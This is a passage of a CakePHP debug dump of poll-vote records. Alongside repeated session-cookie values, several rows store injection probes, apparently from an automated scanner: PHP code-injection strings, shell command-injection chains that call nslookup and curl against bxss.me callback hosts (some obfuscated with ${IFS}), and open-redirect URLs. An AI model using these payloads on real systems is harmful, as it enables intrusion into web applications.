(int) 6311 => array(
'id' => '6854',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6312 => array(
'id' => '6855',
'ip' => '85.190.233.47',
'ip1' => '${@print(md5(31337))}\',
'sondage_id' => '2'
),
(int) 6313 => array(
'id' => '6856',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6314 => array(
'id' => '6857',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6315 => array(
'id' => '6858',
'ip' => '85.190.233.47',
'ip1' => ''.print(md5(31337)).'',
'sondage_id' => '2'
),
(int) 6316 => array(
'id' => '6859',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6317 => array(
'id' => '6860',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6318 => array(
'id' => '6861',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6319 => array(
'id' => '6862',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6320 => array(
'id' => '6863',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6321 => array(
'id' => '6864',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6322 => array(
'id' => '6865',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6323 => array(
'id' => '6866',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6324 => array(
'id' => '6867',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6325 => array(
'id' => '6868',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6326 => array(
'id' => '6869',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6327 => array(
'id' => '6870',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6328 => array(
'id' => '6871',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6329 => array(
'id' => '6872',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6330 => array(
'id' => '6873',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6331 => array(
'id' => '6874',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6332 => array(
'id' => '6875',
'ip' => '85.190.233.47',
'ip1' => 'echo ouzfyh$()\ soimkw\nz^xyu||a #' &echo ouzfyh$()\ soimkw\nz^xyu||a #|" &echo ouzfyh$()\ soimkw\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 6333 => array(
'id' => '6876',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6334 => array(
'id' => '6877',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6335 => array(
'id' => '6878',
'ip' => '85.190.233.47',
'ip1' => '&echo evpear$()\ eutxdc\nz^xyu||a #' &echo evpear$()\ eutxdc\nz^xyu||a #|" &echo evpear$()\ eutxdc\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 6336 => array(
'id' => '6879',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6337 => array(
'id' => '6880',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6338 => array(
'id' => '6881',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2&echo xgrpvo$()\ cqfzlt\nz^xyu||a #' &echo xgrpvo$()\ cqfzlt\nz^xyu||a #|" &echo xgrpvo$()\ cqfzlt\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 6339 => array(
'id' => '6882',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6340 => array(
'id' => '6883',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6341 => array(
'id' => '6884',
'ip' => '85.190.233.47',
'ip1' => '|echo ueniuz$()\ vnjxmo\nz^xyu||a #' |echo ueniuz$()\ vnjxmo\nz^xyu||a #|" |echo ueniuz$()\ vnjxmo\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 6342 => array(
'id' => '6885',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2|echo esqizp$()\ qwqbuy\nz^xyu||a #' |echo esqizp$()\ qwqbuy\nz^xyu||a #|" |echo esqizp$()\ qwqbuy\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 6343 => array(
'id' => '6886',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6344 => array(
'id' => '6887',
'ip' => '85.190.233.47',
'ip1' => '(nslookup -q=cname hitbtodkrthvv44d41.bxss.me||curl hitbtodkrthvv44d41.bxss.me))',
'sondage_id' => '2'
),
(int) 6345 => array(
'id' => '6888',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6346 => array(
'id' => '6889',
'ip' => '85.190.233.47',
'ip1' => '$(nslookup -q=cname hitsnhboxdobx656d1.bxss.me||curl hitsnhboxdobx656d1.bxss.me)',
'sondage_id' => '2'
),
(int) 6347 => array(
'id' => '6890',
'ip' => '85.190.233.47',
'ip1' => '&nslookup -q=cname hitndkfvnzqvh2aac1.bxss.me&'\"`0&nslookup -q=cname hitndkfvnzqvh2aac1.bxss.me&`'',
'sondage_id' => '2'
),
(int) 6348 => array(
'id' => '6891',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6349 => array(
'id' => '6892',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6350 => array(
'id' => '6893',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6351 => array(
'id' => '6894',
'ip' => '85.190.233.47',
'ip1' => '&(nslookup -q=cname hitpyrwlfgaim22289.bxss.me||curl hitpyrwlfgaim22289.bxss.me)&'\"`0&(nslookup -q=cname hitpyrwlfgaim22289.bxss.me||curl hitpyrwlfgaim22289.bxss.me)&`'',
'sondage_id' => '2'
),
(int) 6352 => array(
'id' => '6895',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6353 => array(
'id' => '6896',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6354 => array(
'id' => '6897',
'ip' => '85.190.233.47',
'ip1' => '|(nslookup -q=cname hithpukzzeiqe59668.bxss.me||curl hithpukzzeiqe59668.bxss.me)',
'sondage_id' => '2'
),
(int) 6355 => array(
'id' => '6898',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6356 => array(
'id' => '6899',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6357 => array(
'id' => '6900',
'ip' => '85.190.233.47',
'ip1' => '`(nslookup -q=cname hitceshuitsklbcf9b.bxss.me||curl hitceshuitsklbcf9b.bxss.me)`',
'sondage_id' => '2'
),
(int) 6358 => array(
'id' => '6901',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6359 => array(
'id' => '6902',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6360 => array(
'id' => '6903',
'ip' => '85.190.233.47',
'ip1' => ';(nslookup -q=cname hitghacitkpll8bcec.bxss.me||curl hitghacitkpll8bcec.bxss.me)|(nslookup -q=cname hitghacitkpll8bcec.bxss.me||curl hitghacitkpll8bcec.bxss.me)&(nslookup -q=cname hitghacitkpll8bcec.bxss.me||curl hitghacitkpll8bcec.bxss.me)',
'sondage_id' => '2'
),
(int) 6361 => array(
'id' => '6904',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6362 => array(
'id' => '6905',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6363 => array(
'id' => '6906',
'ip' => '85.190.233.47',
'ip1' => '|(nslookup${IFS}-q${IFS}cname${IFS}hitusqhbzurir77c18.bxss.me||curl${IFS}hitusqhbzurir77c18.bxss.me)',
'sondage_id' => '2'
),
(int) 6364 => array(
'id' => '6907',
'ip' => 'https:\\bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6365 => array(
'id' => '6908',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6366 => array(
'id' => '6909',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6367 => array(
'id' => '6910',
'ip' => '85.190.233.47',
'ip1' => '&(nslookup${IFS}-q${IFS}cname${IFS}hitqauusltjrqe57b2.bxss.me||curl${IFS}hitqauusltjrqe57b2.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitqauusltjrqe57b2.bxss.me||curl${IFS}hitqauusltjrqe57b2.bxss.me)&`'',
'sondage_id' => '2'
),
(int) 6368 => array(
'id' => '6911',
'ip' => 'https:\\bxss.me/',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6369 => array(
'id' => '6912',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6370 => array(
'id' => '6913',
'ip' => 'https:\\bxss.me/\',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6371 => array(
'id' => '6914',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6372 => array(
'id' => '6915',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6373 => array(
'id' => '6916',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6374 => array(
'id' => '6917',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6375 => array(
'id' => '6918',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6376 => array(
'id' => '6919',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6377 => array(
'id' => '6920',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6378 => array(
'id' => '6921',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6379 => array(
'id' => '6922',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6380 => array(
'id' => '6923',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6381 => array(
'id' => '6924',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6382 => array(
'id' => '6925',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6383 => array(
'id' => '6926',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6384 => array(
'id' => '6927',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6385 => array(
'id' => '6928',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6386 => array(
'id' => '6929',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6387 => array(
'id' => '6930',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6388 => array(
'id' => '6931',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6389 => array(
'id' => '6932',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6390 => array(
'id' => '6933',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6391 => array(
'id' => '6934',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6392 => array(
'id' => '6935',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6393 => array(
'id' => '6936',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6394 => array(
'id' => '6937',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6395 => array(
'id' => '6938',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6396 => array(
'id' => '6939',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6397 => array(
'id' => '6940',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6398 => array(
'id' => '6941',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6399 => array(
'id' => '6942',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6400 => array(
'id' => '6943',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6401 => array(
'id' => '6944',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6402 => array(
'id' => '6945',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6403 => array(
'id' => '6946',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6404 => array(
'id' => '6947',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6405 => array(
'id' => '6948',
'ip' => '/\bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6406 => array(
'id' => '6949',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6407 => array(
'id' => '6950',
'ip' => '/\scimat.dz.bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6408 => array(
'id' => '6951',
'ip' => '/\scimat.dz@bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6409 => array(
'id' => '6952',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6410 => array(
'id' => '6953',
'ip' => '/\bxss.me\@scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6411 => array(
'id' => '6954',
'ip' => '/\bxss.me#scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6412 => array(
'id' => '6955',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6413 => array(
'id' => '6956',
'ip' => '/\bxss.me?scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6414 => array(
'id' => '6957',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6415 => array(
'id' => '6958',
'ip' => '/\/bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6416 => array(
'id' => '6959',
'ip' => '/\/scimat.dz.bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6417 => array(
'id' => '6960',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6418 => array(
'id' => '6961',
'ip' => '/\/scimat.dz@bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6419 => array(
'id' => '6962',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6420 => array(
'id' => '6963',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6421 => array(
'id' => '6964',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6422 => array(
'id' => '6965',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6423 => array(
'id' => '6966',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6424 => array(
'id' => '6967',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6425 => array(
'id' => '6968',
'ip' => '/\/bxss.me#scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6426 => array(
'id' => '6969',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6427 => array(
'id' => '6970',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6428 => array(
'id' => '6971',
'ip' => '/\/bxss.me?scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6429 => array(
'id' => '6972',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6430 => array(
'id' => '6973',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6431 => array(
'id' => '6974',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6432 => array(
'id' => '6975',
'ip' => '\\bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6433 => array(
'id' => '6976',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6434 => array(
'id' => '6977',
'ip' => '\\scimat.dz.bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6435 => array(
'id' => '6978',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6436 => array(
'id' => '6979',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6437 => array(
'id' => '6980',
'ip' => '\\scimat.dz@bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6438 => array(
'id' => '6981',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6439 => array(
'id' => '6982',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6440 => array(
'id' => '6983',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6441 => array(
'id' => '6984',
'ip' => '\\bxss.me\@scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6442 => array(
'id' => '6985',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6443 => array(
'id' => '6986',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6444 => array(
'id' => '6987',
'ip' => '\\bxss.me#scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6445 => array(
'id' => '6988',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6446 => array(
'id' => '6989',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6447 => array(
'id' => '6990',
'ip' => '\\bxss.me?scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6448 => array(
'id' => '6991',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6449 => array(
'id' => '6992',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6450 => array(
'id' => '6993',
'ip' => '85.190.233.47',
'ip1' => 'https://scimat.dz/',
'sondage_id' => '2'
),
(int) 6451 => array(
'id' => '6994',
'ip' => '85.190.233.47',
'ip1' => 'https://redirtest.acx/',
'sondage_id' => '2'
),
(int) 6452 => array(
'id' => '6995',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6453 => array(
'id' => '6996',
'ip' => '85.190.233.47',
'ip1' => 'scimat.dz',
'sondage_id' => '2'
),
(int) 6454 => array(
'id' => '6997',
'ip' => '85.190.233.47',
'ip1' => 'redirtest.acx',
'sondage_id' => '2'
),
(int) 6455 => array(
'id' => '6998',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6456 => array(
'id' => '6999',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6457 => array(
'id' => '7000',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6458 => array(
'id' => '7001',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6459 => array(
'id' => '7002',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6460 => array(
'id' => '7003',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6461 => array(
'id' => '7004',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6462 => array(
'id' => '7005',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6463 => array(
'id' => '7006',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6464 => array(
'id' => '7007',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6465 => array(
'id' => '7008',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6466 => array(
'id' => '7009',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6467 => array(
'id' => '7010',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6468 => array(
'id' => '7011',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6469 => array(
'id' => '7012',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6470 => array(
'id' => '7013',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6471 => array(
'id' => '7014',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
